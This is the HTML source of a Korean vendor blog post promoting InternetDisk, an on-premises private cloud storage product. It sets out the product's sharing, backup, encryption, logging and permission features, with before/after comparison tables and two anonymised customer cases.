&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt; &amp;nbsp;&lt;/span&gt;업무 데이터는 개인 PC가 아닌, 조직이 통제하는 안전한 공간에 저장되어야 합니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt; &lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;내부 공유&amp;middot;협업 과정에서의 보안 사각지대&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;팀 단위의 협업을 위해 이메일 첨부, 메신저 전송, USB 복사 등 비공식 채널을 사용하다 보면 파일 버전 관리는 물론 접근 이력 추적조차 불가능해집니다. 외부 협력업체와 자료를 주고받는 과정도 마찬가지입니다.&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt; &amp;nbsp;&lt;/span&gt;공유와 협업 그 자체가 보안 취약점이 되지 않도록, 통제된 채널을 갖추는 것이 핵심입니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt; &lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;분산된 데이터에 대한 관리&amp;middot;감사의 어려움&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;누가, 언제, 어떤 파일에 접근했는지 추적할 수 있어야 내부 정보 유출 사고를 예방하고 사후 대응도 가능합니다. 하지만 파일이 흩어져 있다면 로그 수집 자체가 불가능합니다. 특히 금융, 공공, 제조 등 규제 업종은 이런 감사 요건이 더욱 엄격합니다.&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;span style=&quot;color: #333333; text-align: start;&quot;&gt; &amp;nbsp;&lt;/span&gt;&lt;b&gt;파일에 대한 접근 및 작업 이력을 실시간으로 파악할 수 있는 통합 관리 환경이 필요합니다.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;데이터의 분산과 유출을 막는 솔루션, 인터넷디스크&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이스트시큐리티의 &lt;b&gt;인터넷디스크(InternetDisk)&lt;/b&gt; 는 &lt;b&gt;문서의 열람&amp;middot;저장&amp;middot;공유&amp;middot;협업&amp;middot;보안을 하나의 플랫폼에서 처리하는 구축형 프라이빗 클라우드 스토리지 솔루션&lt;/b&gt;입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;외부 퍼블릭 클라우드가 아닌 &lt;u&gt;조직 내부에 직접 구축&lt;/u&gt;하는 방식이기 때문에, 데이터 주권을 완전히 유지하면서도 클라우드 수준의 편의성과 협업 환경을 제공합니다. 많은 금융&amp;middot;공공&amp;middot;대기업 고객이 이미 신뢰하고 도입한 검증된 솔루션입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;스크린샷 2026-03-03 18.43.52.png&quot; data-origin-width=&quot;2504&quot; data-origin-height=&quot;1118&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/RLeND/dJMcaaEqV0E/YWJyr7raSI1J4O4ExFsICk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/RLeND/dJMcaaEqV0E/YWJyr7raSI1J4O4ExFsICk/img.png&quot; data-alt=&quot;[이미지] 편리하고 안전한 업무환경을 지원하는 인터넷디스크&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/RLeND/dJMcaaEqV0E/YWJyr7raSI1J4O4ExFsICk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FRLeND%2FdJMcaaEqV0E%2FYWJyr7raSI1J4O4ExFsICk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2504&quot; height=&quot;1118&quot; data-filename=&quot;스크린샷 2026-03-03 18.43.52.png&quot; data-origin-width=&quot;2504&quot; data-origin-height=&quot;1118&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 편리하고 안전한 업무환경을 지원하는 인터넷디스크&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&amp;nbsp;&lt;/h4&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;  &lt;/span&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;인터넷디스크&amp;nbsp;핵심&amp;nbsp;기능&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1. 어디서든, 어떤 환경에서든 &amp;mdash; 다양한 접속 환경 지원&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;웹 브라우저, 전용 탐색기, 윈도우 탐색기 등 익숙한 환경 그대로 사용 가능&lt;/li&gt;
&lt;li&gt;모바일 전용 웹을 통해 스마트폰에서도 문서 열람 및 공유&lt;/li&gt;
&lt;li&gt;한국어&amp;middot;영어&amp;middot;일어 UI 및 유니코드 지원으로 글로벌 업무 환경 대응&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt; &amp;nbsp;&lt;b&gt;기존 업무 방식을 바꾸지 않아도 됩니다.&lt;/b&gt;&amp;nbsp;윈도우 탐색기처럼 쓰면서 보안 서버에 저장됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;2. 안전하고 원활한 공유&amp;middot;협업&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;부서별, 프로젝트별로 별도 디스크 구성 가능&lt;/li&gt;
&lt;li&gt;폴더 단위 공유 및 사용자&amp;middot;그룹별 세부 권한 설정&lt;/li&gt;
&lt;li&gt;게스트 폴더, 웹 링크 기능으로 외부 협력업체와도 통제된 자료 공유 가능&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;width: 70.5814%; border-collapse: collapse; line-height: 1.6; font-size: 14px; height: 80px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: left; height: 22px;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 26.2003%; color: #444444; background-color: #fcfcfc; height: 22px;&quot;&gt;&lt;b&gt;공유방식&lt;/b&gt;&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 44.3811%; color: #444444; background-color: #fcfcfc; height: 22px;&quot;&gt;&lt;b&gt;상세 내용&lt;/b&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: left; height: 10px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; width: 26.2003%; height: 10px;&quot;&gt;조직 내 폴더 공유&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; width: 44.3811%; height: 10px;&quot;&gt;부서/프로젝트 단위로 접근 권한 부여&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: left; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; width: 26.2003%; height: 24px;&quot;&gt;게스트 폴더&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; width: 44.3811%; height: 24px;&quot;&gt;외부 협력사 계정 없이 지정 폴더 공유&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: left; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; width: 26.2003%; height: 24px;&quot;&gt;웹 링크 공유&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; width: 44.3811%; height: 24px;&quot;&gt;URL 기반으로 특정 파일&amp;middot;폴더 공유&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;3. 자동 백업 및 문서 유실 방지&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;관리자가 설정한 스케줄에 따라 사용자 PC를 자동으로 주기적 백업&lt;/li&gt;
&lt;li&gt;정상적으로 삭제된 파일도 일정 기간 보관 &amp;rarr; 관리자 복구 가능&lt;/li&gt;
&lt;li&gt;버전 관리 기능으로 이전 버전 복원 지원&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;  랜섬웨어로 파일이 암호화되어도, 인터넷디스크에 저장된 이전 버전으로 즉시 복구할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4. 전송 구간 및 저장 파일 암호화&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;파일 업로드&amp;middot;다운로드 전송 구간 암호화 적용&lt;/li&gt;
&lt;li&gt;서버 저장 시에도 암호화 처리 &amp;rarr; 해킹&amp;middot;도난 시에도 정보 유출 차단&lt;/li&gt;
&lt;li&gt;주요 파일은 보안 폴더에 저장, 비인가 접근 원천 차단&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;5. 실시간 모니터링 및 로그 관리&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;파일 업로드, 다운로드, 삭제 등 모든 작업 이력 로그 기록&lt;/li&gt;
&lt;li&gt;관리자 작업 내역까지 로깅 &amp;rarr; 내부자 위협 대응 및 감사 대응 가능&lt;/li&gt;
&lt;li&gt;조직 전체 데이터 흐름을 한눈에 파악&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;6. 사용자&amp;middot;권한 통합 관리&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;조직도 형태로 사용자 등록 및 관리&lt;/li&gt;
&lt;li&gt;사용자&amp;middot;부서&amp;middot;그룹별 폴더 접근 및 작업 권한 세부 설정&lt;/li&gt;
&lt;li&gt;별도 프로젝트 그룹 생성으로 유연한 협업 구조 지원&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;한눈에 보는 인터넷디스크 도입 효과&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;table style=&quot;width: 100%; border-collapse: collapse; line-height: 1.6; font-size: 14px; height: 142px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: center; height: 22px;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 50%; color: #444444; background-color: #fcfcfc; height: 22px; text-align: center;&quot;&gt;&lt;b&gt;도입 전&lt;/b&gt;&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 50%; color: #444444; background-color: #fcfcfc; height: 22px; text-align: center;&quot;&gt;&lt;b&gt;도입 후&lt;/b&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: center; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;문서가 개인 PC에 분산 저장&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;서버 중앙 저장, 데이터 유실 방지&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: center; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;메신저&amp;middot;이메일로 비공식 공유&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;통제된 채널로 안전한 협업&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: center; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;접근 이력 추적 불가&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;실시간 로그 기록&amp;middot;감사 대응&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: center; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;랜섬웨어&amp;middot;PC 고장 시 복구 불가&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;자동 백업&amp;middot;버전 관리로 즉시 복구&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; text-align: center; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;외부 협력사와 보안 취약한 파일 공유&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; font-weight: normal; height: 24px; text-align: center;&quot;&gt;게스트 폴더&amp;middot;웹 링크로 안전하게 공유&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;고객 도입 사례&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;S사 (1,300 유저 도입)&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&amp;nbsp;사내 파일 서버 보안 개선 과정에서 사용자 파일 작업 이력 확인이 필요했습니다. 인터넷디스크 도입 후 윈도우 탐색기 환경 그대로 서버 저장 영역에서 작업할 수 있어&amp;nbsp;&lt;b&gt;업무 효율성과 편의성이 동시에 향상&lt;/b&gt;되었습니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;P사 (1,000 유저 도입)&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&amp;nbsp;연구소 내 작업물 공유&amp;middot;백업을 위해 웹하드 도입을 검토하던 중, 기존 솔루션과 충돌하지 않으면서 보안성을 갖춘 인터넷디스크를 선택했습니다. 저장&amp;middot;전송 암호화로 보안 요구사항을 충족하면서도&amp;nbsp;&lt;b&gt;기존 업무 환경 그대로 협업&lt;/b&gt;이 가능한 점이 도입 결정의 핵심이었습니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/span&gt;이런 조직이라면, 인터넷디스크 도입을 검토해보세요!&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;직원 PC에 분산된 업무 문서를 중앙에서 통합 관리하고 싶은 조직&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;랜섬웨어&amp;middot;PC 고장으로 인한 데이터 유실이 걱정되는 조직&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;외부 협력업체와의 안전한 자료 공유 방법이 필요한 조직&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;금융&amp;middot;공공 등 규제 업종에서 파일 접근 로그와 감사 요건을 충족해야 하는 조직&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;퍼블릭 클라우드 대신 데이터 주권을 확보한 내부 구축형 스토리지를 원하는 조직&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;☑︎ &lt;/span&gt;재택&amp;middot;원격 근무 환경에서도 보안을 유지하며 협업하고 싶은 조직&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;데이터는 기업의 핵심 자산입니다. 하지만 그 자산이 어디에 있는지조차 파악되지 않는다면, 보안은 시작조차 할 수 없습니다. 인터넷디스크는 데이터를 조직의 통제 안으로 되돌려 놓고, 그 위에서 안전한 협업이 이뤄질 수 있도록 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이스트시큐리티가&lt;span&gt; &lt;/span&gt;고객사의&lt;span&gt; &lt;/span&gt;업무&lt;span&gt; &lt;/span&gt;환경에&lt;span&gt; &lt;/span&gt;최적화된&lt;span&gt; &lt;/span&gt;데이터&lt;span&gt; &lt;/span&gt;보안&lt;span&gt; &lt;/span&gt;체계&lt;span&gt; &lt;/span&gt;구축을&lt;span&gt; &lt;/span&gt;도와드리겠습니다&lt;span&gt;. &lt;/span&gt;인터넷디스크 도입 관련하여 도움이&lt;span&gt;&amp;nbsp;&lt;/span&gt;필요하시면&lt;span&gt;, 아래 배너를 통해&lt;/span&gt;&lt;span&gt; 컨설팅을 신청해주세요!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
